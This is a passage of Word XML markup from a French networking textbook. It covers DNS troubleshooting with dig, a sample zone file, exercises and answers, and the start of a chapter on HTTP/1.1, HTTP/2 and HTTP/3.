            <w:tcW w:type="dxa" w:w="243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SERVFAIL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Zone cassée ou DNSSEC invalide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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dig +dnssec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mauvaise adresse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cache ancien ou zone non mise à jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>TTL et numéro de série</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="243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Lenteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Résolveur distant ou timeouts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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dig</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> chronométré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Échec intermittent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Serveurs secondaires incohérents</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interroger chaque NS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre vérifications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Interroger directement un serveur autoritaire</w:t>
        <w:br/>
        <w:t>dig @ns1.exemple.fr www.exemple.fr A</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier la cohérence entre serveurs</w:t>
        <w:br/>
        <w:t>for ns in $(dig +short NS exemple.fr); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "— $ns"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  dig @$ns +short www.exemple.fr</w:t>
        <w:br/>
        <w:t>done</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier DNSSEC</w:t>
        <w:br/>
        <w:t>dig +dnssec exemple.fr</w:t>
        <w:br/>
        <w:t>delv exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vider les caches locaux</w:t>
        <w:br/>
        <w:t>resolvectl flush-caches</w:t>
        <w:br/>
        <w:t>systemd-resolve --flush-caches 2&gt;/dev/null || true</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DNSSEC</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Extension qui signe cryptographiquement les réponses DNS. Elle protège contre l'empoisonnement de cache, mais ne chiffre pas les requêtes : c'est le rôle de DoH et DoT.</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DIAGNOSTIC DNS EN QUATRE COMMANDES</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dig nom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : la réponse est-elle correcte ?</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dig @1.1.1.1 nom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : le résolveur local est-il en cause ?</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dig @ns1.zone nom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : la zone autoritaire est-elle à jour ?</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dig +trace nom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : où la délégation casse-t-elle ?</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DNS est une hiérarchie de délégations, pas un annuaire central.</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résolveur récursif interroge la hiérarchie puis met en cache.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Chaque type d'enregistrement a un usage précis.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CNAME ne cohabite pas avec d'autres enregistrements.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numéro de série SOA déclenche la propagation vers les secondaires.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TTL détermine la durée de vie dans les caches.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Baisser le TTL avant une migration évite une bascule partielle.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dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>+trace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> localisent une panne de délégation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les noms résolvent. Le chapitre suivant décrit le protocole qui transporte les pages : HTTP.</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56.1 — Créer une zone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 xml:space="preserve">Le domaine </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exemple.fr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doit servir un site et du courrier.</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Déclarez les serveurs de noms.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Ajoutez A, MX, TXT et CAA.</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 xml:space="preserve">Vérifiez avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 56.2 — Diagnostiquer une résolution erronée</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Le site répond sur l'ancienne adresse après une migration.</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Interrogez plusieurs résolveurs.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Vérifiez le TTL restant.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la zone autoritaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 56.3 — Vérifier une configuration de courrier</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Les messages partent mais arrivent en spam.</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Vérifiez MX, SPF, DKIM et DMARC.</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Contrôlez la cohérence des noms.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les enregistrements publics.</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56.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>$TTL 300</w:t>
        <w:br/>
        <w:t>@   IN SOA ns1.exemple.fr. admin.exemple.fr. (</w:t>
        <w:br/>
        <w:t xml:space="preserve">        2026031501 7200 3600 1209600 300 )</w:t>
        <w:br/>
        <w:t>@   IN NS  ns1.exemple.fr.</w:t>
        <w:br/>
        <w:t>@   IN NS  ns2.exemple.fr.</w:t>
        <w:br/>
        <w:t>@   IN A   203.0.113.10</w:t>
        <w:br/>
        <w:t>www IN A   203.0.113.10</w:t>
        <w:br/>
        <w:t>@   IN MX  10 mail.exemple.fr.</w:t>
        <w:br/>
        <w:t>mail IN A  203.0.113.20</w:t>
        <w:br/>
        <w:t>@   IN TXT "v=spf1 mx -all"</w:t>
        <w:br/>
        <w:t>@   IN CAA 0 issue "letsencrypt.org"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un TTL de 300 facilite les ajustements pendant la mise en place.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SPF et CAA sont deux enregistrements souvent oubliés qui conditionnent la délivrabilité du courrier et l'émission de certificats.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 56.2</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dig +short www.exemple.fr</w:t>
        <w:br/>
        <w:t>dig @1.1.1.1 +short www.exemple.fr</w:t>
        <w:br/>
        <w:t>dig @ns1.exemple.fr +short www.exemple.fr</w:t>
        <w:br/>
        <w:br/>
        <w:t># Si l'autoritaire est correct et le résolveur faux : cache</w:t>
        <w:br/>
        <w:t>dig www.exemple.fr | grep -E "TTL|Query time"</w:t>
        <w:br/>
        <w:t># Attendre l'expiration, ou demander la purge au fournisseur</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un écart entre autoritaire et résolveur public est un cache non expiré, pas une zone mal configurée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Interroger chaque serveur de noms révèle une réplication incomplète entre primaire et secondaires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 56.3</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dig +short MX exemple.fr</w:t>
        <w:br/>
        <w:t>dig +short TXT exemple.fr</w:t>
        <w:br/>
        <w:t>dig +short TXT _dmarc.exemple.fr</w:t>
        <w:br/>
        <w:t>dig +short TXT selector1._domainkey.exemple.fr</w:t>
        <w:br/>
        <w:t>dig +short -x 203.0.113.20     # nom inverse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SPF autorise les serveurs d'envoi, DKIM signe les messages, DMARC indique la politique en cas d'échec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un enregistrement inverse (PTR) cohérent améliore fortement la délivrabilité.</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 type associe un nom à une adresse IPv4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AAAA</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A</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MX</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CNAME</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 détermine le TTL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La vitesse du serveur</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La durée de mise en cache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 nombre de requêtes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La priorité des MX</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Pourquoi éviter un CNAME à la racine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C'est interdit par la loi</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Il ne peut coexister avec SOA et NS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Il est trop lent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Il casse TLS</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 signifie NXDOMAIN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Erreur serveur</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 nom n'existe pas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Zone expirée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Timeout</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 xml:space="preserve">Que fait </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>dig +trace</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Mesure le temps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Suit la délégation depuis la racine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Vide le cache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Signe la requête</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contient une adresse IPv4, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une adresse IPv6.</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Chaque résolveur peut conserver la réponse pendant cette durée.</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Le CNAME exclut tout autre enregistrement au même nom.</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Le nom demandé n'existe pas dans la zone.</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Il montre chaque étape de la résolution hiérarchique.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>57. HTTP/1.1, HTTP/2 et HTTP/3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Le protocole des applications web, ses versions et ce qu'elles changent réellement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 56</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Décomposer une requête et une réponse HTTP.</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Interpréter les méthodes, statuts et en-têtes.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Expliquer ce que chaque version apporte.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Diagnostiquer un problème de cache ou de contenu.</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Choisir une configuration de serveur adaptée.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>57.1 Un protocole textuel devenu binaire</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>HTTP/1.1 transporte des messages lisibles ; HTTP/2 et HTTP/3 utilisent un format binaire. Le modèle reste le même : une requête, une réponse, un ensemble d'en-têtes et un corps optionnel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une requête, ligne par ligne · http</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GET /articles/css-grid HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: exemple.fr</w:t>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0</w:t>
        <w:br/>
        <w:t>Accept: text/html,application/xhtml+xml</w:t>
        <w:br/>
        <w:t>Accept-Encoding: gzip, br</w:t>
        <w:br/>
        <w:t>If-None-Match: "a1b2c3"</w:t>
        <w:br/>
        <w:t>Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>La réponse correspondante · http</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HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t>Date: Thu, 15 Oct 2026 09:14:00 GMT</w:t>
        <w:br/>
        <w:t>Content-Type: text/html; charset=utf-8</w:t>
        <w:br/>
        <w:t>Content-Encoding: br</w:t>
        <w:br/>
        <w:t>Cache-Control: public, max-age=300</w:t>
        <w:br/>
        <w:t>ETag: "d4e5f6"</w:t>
        <w:br/>
        <w:t>Vary: Accept-Encoding</w:t>
        <w:br/>
        <w:br/>
        <w:t>&lt;!doctype html&gt;</w:t>
        <w:br/>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.198 — Quatre parties d'un message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3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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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314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Taille typique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ligne de requête</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Méthode, cible, version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>20–80 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="273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En-têtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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Métadonnées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="314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300–800 octets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2732"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Corps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3141"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
